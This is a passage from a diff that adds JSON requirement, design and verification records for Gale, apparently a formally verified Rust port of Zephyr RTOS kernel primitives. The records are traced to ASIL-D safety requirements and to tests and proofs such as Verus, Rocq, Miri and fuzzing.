+      "status": "approved",
+      "tags": [
+        "kheap",
+        "init",
+        "asil-d"
+      ],
+      "title": "KH1: init establishes empty heap with wait queue",
+      "type": "sw-req"
+    },
+    {
+      "description": "Threads that are idle, prevented from running, or cooperative with priority higher than slice_max_prio receive a zero slice size, disabling time-slicing for them. Maps to timeslicing.c:39-59.\n",
+      "id": "SWREQ-TS-TS02",
+      "links": [
+        {
+          "target": "SYSREQ-TS-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TS-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "eligibility",
+        "asil-d"
+      ],
+      "title": "TS2: ineligible threads get zero slice size",
+      "type": "sw-req"
+    },
+    {
+      "description": "CI workflow .github/workflows/binary-size.yml measures the FLASH usage of Gale vs a baseline Zephyr-only build on qemu_cortex_m3 for the semaphore benchmark application. The check fails if Gale increases FLASH by more than 10%, enforcing SWREQ-PERF-P01. Executed via: west build; size analysis script.\n",
+      "id": "FV-PERF-001",
+      "links": [
+        {
+          "target": "SWREQ-PERF-P01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "performance",
+        "binary-size",
+        "ci",
+        "swe-6"
+      ],
+      "title": "Binary size CI check (PERF)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The current tick counter never decreases. Each announce call advances curr_tick by the given ticks count.\n",
+      "id": "SWREQ-TO-TO06",
+      "links": [
+        {
+          "target": "SYSREQ-TO-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "monotonic",
+        "asil-d"
+      ],
+      "title": "TO6: curr_tick monotonically increases",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a timer that supports both periodic (auto-restarting) and one-shot (single expiration) modes, configurable via the period parameter at start time.\n",
+      "id": "ZEP-SRS-TM-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-TM",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "timer"
+      ],
+      "title": "Zephyr: Timer Periodic and One-Shot Mode",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "The semaphore limit is always strictly positive. Enforced by init rejecting limit == 0 with -EINVAL.\n",
+      "id": "SWREQ-SEM-P02",
+      "links": [
+        {
+          "target": "SYSREQ-SEM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-5-18",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sem",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "P2: limit > 0 (always)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The guard region size must be strictly less than total stack size, ensuring usable stack space remains.\n",
+      "id": "SWREQ-SKS-SK02",
+      "links": [
+        {
+          "target": "SYSREQ-SKS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack-config",
+        "guard",
+        "asil-d"
+      ],
+      "title": "SK_S2: guard_size <= size",
+      "type": "sw-req"
+    },
+    {
+      "description": "The number of allocated blocks never exceeds the pool capacity.\n",
+      "id": "SWREQ-MP-MP01",
+      "links": [
+        {
+          "target": "SYSREQ-MP-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MP-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mempool",
+        "invariant",
+        "asil-d"
+      ],
+      "title": "MP1: 0 <= allocated <= capacity (bounds invariant)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Static analysis via cargo audit, clippy, and grep confirms that Gale source files contain no references to thread_monitor, obj_core, spinlock_validate, or usage tracking subsystems. Validates that monitoring exclusion architecture (SWARCH-MON-001) is correctly implemented and no forbidden symbols are linked. Executed via: .github/workflows/static-analysis.yml\n",
+      "id": "FV-MON-001",
+      "links": [
+        {
+          "target": "SWREQ-MON-M01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-MON-M02",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "monitoring",
+        "swe-6"
+      ],
+      "title": "Monitoring exclusion verification",
+      "type": "sw-verification"
+    },
+    {
+      "description": "After initialization, the condition variable's wait queue has zero entries and the invariant holds. Maps to condvar.c:21-30.\n",
+      "id": "SWREQ-CV-C01",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "init",
+        "asil-d"
+      ],
+      "title": "C1: after init, wait queue is empty",
+      "type": "sw-req"
+    },
+    {
+      "description": "A time-slice subsystem that matches the Zephyr timeslicing semantics: per-thread and global slice durations, eligibility checking based on priority and thread state, slice expiry detection, and round-robin rotation via move_to_end_of_prio_q. Must maintain scheduling fairness invariants and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-TS-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-TS",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "kernel"
+      ],
+      "title": "Time-slicing for preemptive round-robin scheduling",
+      "type": "system-req"
+    },
+    {
+      "description": "Poll event state machine model with init/check/set_ready/signal. Tracks event state (NOT_READY/READY), signal flag, and result value. Actual thread blocking, event registration, and DLL management stays in C — Gale verifies state transitions and signal flag operations only. No unsafe code.\n",
+      "id": "SWARCH-PL-001",
+      "links": [
+        {
+          "target": "SWREQ-PL-PL01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-PL-PL04",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-PL-PL07",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-PL-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "poll",
+        "architecture"
+      ],
+      "title": "Poll module (gale::poll)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "When pop is called and count > 0, count decrements by 1 and returns OK. Maps to stack.c:148-190.\n",
+      "id": "SWREQ-SK-SK05",
+      "links": [
+        {
+          "target": "SYSREQ-SK-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SK-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "stack",
+        "pop",
+        "asil-d"
+      ],
+      "title": "SK5: pop when not empty decrements count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "A message queue that matches the Zephyr k_msgq API semantics: initialization, put (enqueue), put_front (priority enqueue), get (dequeue), peek, and purge.  Must maintain ring buffer index consistency and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-MQ-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-MQ",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "kernel"
+      ],
+      "title": "Message queue with ring buffer semantics",
+      "type": "system-req"
+    },
+    {
+      "description": "Full Zephyr kernel mutex test suite executed on qemu_cortex_m3 with CONFIG_GALE_KERNEL_MUTEX=y. Tests exercise the complete k_mutex API through the Gale FFI/C shim layer, validating functional equivalence with upstream Zephyr. Test suites: zephyr/tests/kernel/mutex (mutex_api, mutex_api_1cpu, sys_mutex).\n",
+      "id": "SV-MUT-001",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "system-verification",
+        "zephyr",
+        "qemu",
+        "sys-5"
+      ],
+      "title": "Mutex Zephyr system integration",
+      "type": "sys-verification"
+    },
+    {
+      "description": "Init levels are processed in strictly ascending order (EARLY < PRE_KERNEL_1 < PRE_KERNEL_2 < POST_KERNEL < APPLICATION < SMP).\n",
+      "id": "SWREQ-DI-DI01",
+      "links": [
+        {
+          "target": "SYSREQ-DI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "ordering",
+        "asil-d"
+      ],
+      "title": "DI1: devices init in level order (lower level first)",
+      "type": "sw-req"
+    },
+    {
+      "description": "Devices within the same init level are initialized by priority (lower priority number first).\n",
+      "id": "SWREQ-DI-DI02",
+      "links": [
+        {
+          "target": "SYSREQ-DI-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "device-init",
+        "ordering",
+        "asil-d"
+      ],
+      "title": "DI2: within same level, init in priority order",
+      "type": "sw-req"
+    },
+    {
+      "description": "Gale's verified Rust code shall perform zero dynamic memory allocation (no_std, no alloc).\n",
+      "id": "SYSREQ-PERF-003",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "performance",
+        "no-alloc",
+        "safety"
+      ],
+      "title": "No heap allocation in verified code",
+      "type": "system-req"
+    },
+    {
+      "description": "After revoke_access(tid), the permission bit for thread tid is cleared. Revoke is idempotent.\n",
+      "id": "SWREQ-US-US03",
+      "links": [
+        {
+          "target": "SYSREQ-US-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "userspace",
+        "revoke",
+        "asil-d"
+      ],
+      "title": "US3: revoke_access clears the permission bit",
+      "type": "sw-req"
+    },
+    {
+      "description": "Unlocking a mutex that is not locked returns -EINVAL.  Unlocking a mutex owned by a different thread returns -EPERM.  In both cases, the mutex state is unchanged. Maps to z_impl_k_mutex_unlock lines 238-250 in kernel/mutex.c.\n",
+      "id": "SWREQ-MUT-M06",
+      "links": [
+        {
+          "target": "SYSREQ-MUT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-MUT-4",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mutex",
+        "unlock",
+        "error",
+        "asil-d"
+      ],
+      "title": "M6: unlock by non-owner returns error (EINVAL/EPERM)",
+      "type": "sw-req"
+    },
+    {
+      "description": "The proof chain connecting source-level verification to binary correctness is fully closed: (1) Gale Verus/Rocq proofs establish semantic correctness. (2) Loom Z3 translation validation proves optimization preserves\n    semantics of the WASM application code.\n(3) Synth Rocq proofs prove ARM codegen matches WASM semantics. No Admitted lemmas or assumed axioms in the chain.\n",
+      "id": "SWREQ-KILN-004",
+      "links": [
+        {
+          "target": "SYSREQ-KILN-002",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "proof-chain",
+        "verified-compilation",
+        "safety"
+      ],
+      "title": "Connected verification chain from source to binary",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a blocking get operation on a FIFO, with a configurable timeout period allowing threads to wait until an item is available.\n",
+      "id": "ZEP-SRS-FI-2",
+      "links": [
+        {
+          "target": "ZEP-SYRS-FI",
+          "type": "derives-from"
+        },
+        {
+          "target": "SWREQ-FI-FI03",
+          "type": "satisfied-by"
+        },
+        {
+          "target": "SWREQ-FI-FI04",
+          "type": "satisfied-by"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "fifo"
+      ],
+      "title": "Zephyr: FIFO Blocking Get With Timeout",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Compute the slot index for a peek at logical position idx. If idx >= used_msgs: return Err(ENOMSG). Otherwise return Ok((read_idx + idx) % max_msgs).\n",
+      "id": "SWDD-MQ-PEEK",
+      "links": [
+        {
+          "target": "SWARCH-MQ-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-MQ-MQ10",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-MQ-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "msgq",
+        "peek"
+      ],
+      "title": "MsgQ::peek_at — z_impl_k_msgq_peek_at slot computation",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Replace the event value entirely with the given bitmask.\n",
+      "id": "SWDD-EV-SET",
+      "links": [
+        {
+          "target": "SWARCH-EV-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-EV-EV02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-EV-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "event",
+        "set"
+      ],
+      "title": "Event::set — z_impl_k_event_set port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "If timeout is active: remove from list, return 0. If inactive: return -EINVAL.\n",
+      "id": "SWDD-TO-ABORT",
+      "links": [
+        {
+          "target": "SWARCH-TO-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TO-TO02",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TO-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "abort"
+      ],
+      "title": "Timeout::abort — z_abort_timeout port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Property-based tests in tests/proptest_condvar.rs exercising waiter bound invariants under random operations, broadcast emptying, signal-count equivalence, signal-empty no-op, and broadcast return count correctness.\n",
+      "id": "UV-CV-002",
+      "links": [
+        {
+          "target": "SWDD-CV-SIGNAL",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-BROADCAST",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-CV-WAIT",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "CondVar property-based tests (proptest)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "When start is called, the status counter is reset to zero regardless of its previous value.\n",
+      "id": "SWREQ-TM-TM03",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-TM-3",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "start",
+        "asil-d"
+      ],
+      "title": "TM3: start resets status",
+      "type": "sw-req"
+    },
+    {
+      "description": "When put is called, the item count increments by 1. Maps to queue.c:206-213.\n",
+      "id": "SWREQ-LI-LI02",
+      "links": [
+        {
+          "target": "SYSREQ-LI-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-LI-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "lifo",
+        "put",
+        "asil-d"
+      ],
+      "title": "LI2: put increments count by 1",
+      "type": "sw-req"
+    },
+    {
+      "description": "A spinlock acquisition succeeds only when the lock is free. Already-held locks reject acquisition.\n",
+      "id": "SWREQ-SL-SL01",
+      "links": [
+        {
+          "target": "SYSREQ-SL-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "spinlock",
+        "acquire",
+        "asil-d"
+      ],
+      "title": "SL1: lock can only be acquired when not held",
+      "type": "sw-req"
+    },
+    {
+      "description": "Full msgq test suite run under Miri to detect undefined behavior, use-after-free, out-of-bounds access, and uninitialized memory reads.\n",
+      "id": "UV-MQ-004",
+      "links": [
+        {
+          "target": "SWDD-MQ-INIT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PUT-FRONT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-GET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PEEK",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PURGE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "miri",
+        "safety",
+        "swe-4"
+      ],
+      "title": "MsgQ Miri undefined behavior detection",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Verus specifications in src/lifo.rs with requires/ensures clauses that formally verify LIFO properties (LI01-LI06) via SMT solving. Proves put/get stack ordering, count tracking, and invariant preservation. Executed via: bazel test //:verus_test\n",
+      "id": "FV-LI-001",
+      "links": [
+        {
+          "target": "SWREQ-LI-LI01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-LI-LI02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-LI-LI03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-LI-LI04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-LI-LI05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-LI-LI06",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "LIFO Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "When broadcast is called on an empty wait queue, zero threads are woken and the condvar state is unchanged. Maps to condvar.c:73-96.\n",
+      "id": "SWREQ-CV-C05",
+      "links": [
+        {
+          "target": "SYSREQ-CV-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "condvar",
+        "broadcast",
+        "asil-d"
+      ],
+      "title": "C5: broadcast on empty condvar returns 0",
+      "type": "sw-req"
+    },
+    {
+      "description": "No arithmetic operation on num_used or num_blocks causes integer overflow. All arithmetic is guarded by bounds checks.\n",
+      "id": "SWREQ-MS-MS08",
+      "links": [
+        {
+          "target": "SYSREQ-MS-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "mem-slab",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "MS8: no overflow on alloc/free",
+      "type": "sw-req"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide a mechanism to create threads dynamically at runtime, allocating stack memory from a pre-configured stack pool.\n",
+      "id": "ZEP-SRS-DY-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-DY",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-DY-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "dynamic"
+      ],
+      "title": "Zephyr: Dynamic Thread Creation",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Rocq proof scripts in proofs/sem_proofs.v targeting semaphore properties via theorem proving on the coq_of_rust translation of the plain Rust code. Independent verification path from Verus. Executed via: bazel test //proofs:sem_proofs_test\n",
+      "id": "FV-SEM-002",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P10",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "rocq",
+        "theorem-proving",
+        "swe-6"
+      ],
+      "title": "Rocq theorem proofs (coq_of_rust)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "The Zephyr RTOS shall provide an event object where threads can post (OR) event bits and wait for specific bits to be set.\n",
+      "id": "ZEP-SRS-EV-1",
+      "links": [
+        {
+          "target": "ZEP-SYRS-EV",
+          "type": "derives-from"
+        },
+        {
+          "target": "SYSREQ-EV-001",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "event"
+      ],
+      "title": "Zephyr: Event Bitmask Post and Wait",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "Compare-and-swap succeeds (stores new value, returns true) only when the current value matches the expected value.\n",
+      "id": "SWREQ-AT-AT03",
+      "links": [
+        {
+          "target": "SYSREQ-AT-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "cas",
+        "asil-d"
+      ],
+      "title": "AT3: cas succeeds only when current == expected",
+      "type": "sw-req"
+    },
+    {
+      "description": "Abort pending timeout, clear expired flag, re-arm if slice_size > 0. C source: kernel/timeslicing.c lines 75-86.\n",
+      "id": "SWDD-TS-RESET",
+      "links": [
+        {
+          "target": "SWARCH-TS-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-TS-TS03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-TS-TS06",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-TS-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeslice",
+        "reset"
+      ],
+      "title": "Timeslice::reset — z_reset_time_slice port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "Fuzz targets in fuzz/fuzz_targets/ exercising random put/get/put_front/peek/purge operation sequences on message queue. Coverage-guided mutation testing.\n",
+      "id": "UV-MQ-005",
+      "links": [
+        {
+          "target": "SWDD-MQ-PUT",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-GET",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-MQ-PURGE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "fuzz",
+        "swe-4"
+      ],
+      "title": "MsgQ fuzz testing (cargo-fuzz)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all queue code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-QU-003",
+      "links": [
+        {
+          "target": "SWREQ-QU-QU01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "Queue Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Verus specifications in src/sem.rs with requires/ensures clauses that formally verify all 10 properties (P1-P10) via SMT solving. Proves absence of panics, overflow, and invariant violations. Executed via: bazel test //:verus_test\n",
+      "id": "FV-SEM-001",
+      "links": [
+        {
+          "target": "SWREQ-SEM-P01",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P02",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P03",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P04",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P05",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P06",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P07",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P08",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P09",
+          "type": "verifies"
+        },
+        {
+          "target": "SWREQ-SEM-P10",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "formal-verification",
+        "verus",
+        "smt",
+        "swe-6"
+      ],
+      "title": "Verus formal verification (SMT/Z3)",
+      "type": "sw-verification"
+    },
+    {
+      "description": "Clippy with ASIL-D lint profile applied to all condvar code. Same deny set as project-wide Cargo.toml [lints.clippy].\n",
+      "id": "FV-CV-003",
+      "links": [
+        {
+          "target": "SWREQ-CV-C01",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "static-analysis",
+        "clippy",
+        "safety",
+        "swe-6"
+      ],
+      "title": "CondVar Clippy safety-critical lint profile",
+      "type": "sw-verification"
+    },
+    {
+      "description": "next_up returns the highest-priority ready thread, considering the idle thread as fallback. Maps to sched.c:185-282.\n",
+      "id": "SWREQ-SC-SC04",
+      "links": [
+        {
+          "target": "SYSREQ-SC-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-SC-1",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "sched",
+        "scheduling",
+        "asil-d"
+      ],
+      "title": "SC4: next_up selects best runnable thread",
+      "type": "sw-req"
+    },
+    {
+      "description": "Gale's verified kernel primitives are standalone — they do not depend on Zephyr C headers, Zephyr build system, or any Zephyr runtime.  The entire kernel object implementation is in verified Rust, callable directly from Kiln.  Zephyr compatibility is optional and provided by a thin adapter layer, not by the core.\n",
+      "id": "SWREQ-KILN-006",
+      "links": [
+        {
+          "target": "SYSREQ-KILN-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "draft",
+      "tags": [
+        "standalone",
+        "no-zephyr",
+        "independence"
+      ],
+      "title": "No Zephyr C dependency for verified kernel primitives",
+      "type": "sw-req"
+    },
+    {
+      "description": "Initialize an empty queue. Set count = 0.\n",
+      "id": "SWDD-QU-INIT",
+      "links": [
+        {
+          "target": "SWARCH-QU-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-QU-QU01",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-QU-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "queue",
+        "init"
+      ],
+      "title": "Queue::init — z_impl_k_queue_init port",
+      "type": "sw-detail-design"
+    },
+    {
+      "description": "No arithmetic operation on the status counter causes integer overflow. Expire uses checked or saturating arithmetic.\n",
+      "id": "SWREQ-TM-TM08",
+      "links": [
+        {
+          "target": "SYSREQ-TM-001",
+          "type": "derives-from"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timer",
+        "safety",
+        "overflow",
+        "asil-d"
+      ],
+      "title": "TM8: no overflow on expire",
+      "type": "sw-req"
+    },
+    {
+      "description": "KernelPanic always results in Halt in production mode, regardless of thread or ISR context.\n",
+      "id": "SWREQ-FT-FT02",
+      "links": [
+        {
+          "target": "SYSREQ-FT-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SRS-FT-2",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "fatal",
+        "panic",
+        "asil-d"
+      ],
+      "title": "FT2: kernel panic is always non-recoverable",
+      "type": "sw-req"
+    },
+    {
+      "description": "Work item state machine model with init/submit/start_running/ finish_running/cancel/finish_cancel. Tracks RUNNING, CANCELING, QUEUED, FLUSHING flags. No unsafe code. no_std compatible.\n",
+      "id": "SWARCH-WK-001",
+      "links": [
+        {
+          "target": "SWREQ-WK-WK01",
+          "type": "allocated-from"
+        },
+        {
+          "target": "SWREQ-WK-WK02",
+          "type": "allocated-from"
+        },
+        {
+          "target": "PROV-WK-001",
+          "type": "replaces"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "work",
+        "architecture"
+      ],
+      "title": "Work module (gale::work)",
+      "type": "sw-arch-component"
+    },
+    {
+      "description": "A timeout subsystem that matches the Zephyr _timeout API semantics: add, abort, remaining, expires, and announce. Must maintain tick arithmetic correctness and never exhibit undefined behavior or arithmetic overflow.\n",
+      "id": "SYSREQ-TO-001",
+      "links": [
+        {
+          "target": "STKH-001",
+          "type": "derives-from"
+        },
+        {
+          "target": "ZEP-SYRS-TO",
+          "type": "satisfies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "timeout",
+        "kernel"
+      ],
+      "title": "Timeout subsystem with tick arithmetic",
+      "type": "system-req"
+    },
+    {
+      "description": "Property-based tests in tests/proptest_sem.rs exercising invariant preservation under random operation sequences, give-take roundtrip, saturation at limit, and underflow at zero.\n",
+      "id": "UV-SEM-002",
+      "links": [
+        {
+          "target": "SWDD-SEM-GIVE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-SEM-TRY-TAKE",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "proptest",
+        "swe-4"
+      ],
+      "title": "Property-based tests (proptest)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "Fuzz targets in fuzz/fuzz_targets/ exercising random write/read/reset/close operation sequences and state transitions on pipe. Coverage-guided mutation testing.\n",
+      "id": "UV-PP-005",
+      "links": [
+        {
+          "target": "SWDD-PP-WRITE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-READ",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-CLOSE",
+          "type": "verifies"
+        },
+        {
+          "target": "SWDD-PP-RESET",
+          "type": "verifies"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "testing",
+        "fuzz",
+        "swe-4"
+      ],
+      "title": "Pipe fuzz testing (cargo-fuzz)",
+      "type": "unit-verification"
+    },
+    {
+      "description": "The system shall implement a condition variable synchronization primitive with signal, broadcast, and wait operations for coordinating threads waiting on a condition.\n",
+      "id": "ZEP-SYRS-CV",
+      "links": [],
+      "status": "approved",
+      "tags": [
+        "zephyr",
+        "upstream",
+        "condvar"
+      ],
+      "title": "Zephyr: Condition Variable",
+      "type": "stakeholder-req"
+    },
+    {
+      "description": "If current == expected: store new_value, return true. Else: leave unchanged, return false. C source: kernel/atomic_c.c lines 88-108.\n",
+      "id": "SWDD-AT-CAS",
+      "links": [
+        {
+          "target": "SWARCH-AT-001",
+          "type": "refines"
+        },
+        {
+          "target": "SWREQ-AT-AT03",
+          "type": "satisfies"
+        },
+        {
+          "target": "SWREQ-AT-AT04",
+          "type": "satisfies"
+        },
+        {
+          "target": "PROV-AT-001",
+          "type": "function-maps-to"
+        }
+      ],
+      "status": "approved",
+      "tags": [
+        "atomic",
+        "cas"
+      ],
+      "title": "AtomicVal::cas — z_impl_atomic_cas port",
+      "type": "sw-detail-design"
+    },
+    {
